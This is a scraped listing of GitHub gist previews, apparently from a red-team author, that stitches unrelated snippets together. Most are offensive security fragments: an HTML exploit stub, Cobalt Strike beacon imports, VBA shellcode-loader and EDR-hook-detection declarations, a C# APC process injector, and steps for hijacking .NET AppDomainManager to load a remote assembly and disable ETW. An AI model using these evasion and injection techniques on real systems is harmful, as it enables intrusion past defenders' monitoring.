-
Install a working (and compiled) version of virt-viewer. You may view the homebrew package's upstream source on GitHub.
brew tap jeffreywildman/homebrew-virt-manager brew install virt-viewer
-
Once that's installed should be able make a call
remote-viewer
with a pve-spice.vv file downloaded from proxmox web interface
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta http-equiv="Expires" content="-1"> | |
<meta http-equiv="X-UA-Compatible" content="IE=11"> | |
</head> | |
<body> | |
<script> | |
var exploit_cab = "[CAB file URL]"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
################################################################################# | |
# # | |
# Refer to this blog post about what this code is used for: # | |
# https://albocoder.github.io/malware/2021/06/01/SandboxStudy.html # | |
# # | |
################################################################################# | |
import requests | |
import os | |
import psutil |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <string.h> | |
#include <stdio.h> | |
#include <windows.h> | |
#include <psapi.h> | |
#include "beacon.h" | |
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD); | |
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); | |
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As Long, ByVal offsetinVft As Long, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As Long, ByRef retVAR As Variant) As Long | |
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long | |
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long | |
Const CC_STDCALL = 4 | |
Const MEM_COMMIT = &H1000 | |
Const PAGE_EXECUTE_READWRITE = &H40 | |
Private VType(0 To 63) As Integer, VPtr(0 To 63) As Long |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
'VBA Macro that detects hooks made by EDRs | |
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
Dim address As LongPtr |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
namespace DinjectorWithQUserAPC | |
{ | |
public class Program |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@Library('ci-jenkins-common') _ | |
// Jenkins build pipeline (declarative) | |
// Project: Seatbelt | |
// URL: https://github.com/GhostPack/Seatbelt | |
// Author: @tifkin_/@harmj0y | |
// Pipeline Author: harmj0y | |
def gitURL = "https://github.com/GhostPack/Seatbelt" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from diagrams import Cluster, Diagram | |
from diagrams.gcp.analytics import BigQuery, Dataflow, PubSub | |
from diagrams.gcp.compute import AppEngine, Functions | |
from diagrams.gcp.database import BigTable | |
from diagrams.gcp.iot import IotCore | |
from diagrams.gcp.storage import GCS | |
with Diagram("Media Monitoring Storage Architecture", show=False) as med_diag: | |
pubsub = PubSub("pubsub") | |
flow = Dataflow("DataFlow") |
This is a variation of the technique originally discovered by subtee
and described here
TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly>
element pointing to a specially crafted .NET assembly which executes when the application is loaded.
This variation allows you to load the AppDomainManager
assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable>
element :)
- Copy some binary you love to say,
C:\Test
. Lets useaspnet_compiler.exe
as an example - Compile
test.cs
totest.dll
with a signed strong name, this is required to load an assembly outside of a .NET applications base directory. - Host
test.dll
on a remote SMB or HTTP(S) server
NewerOlder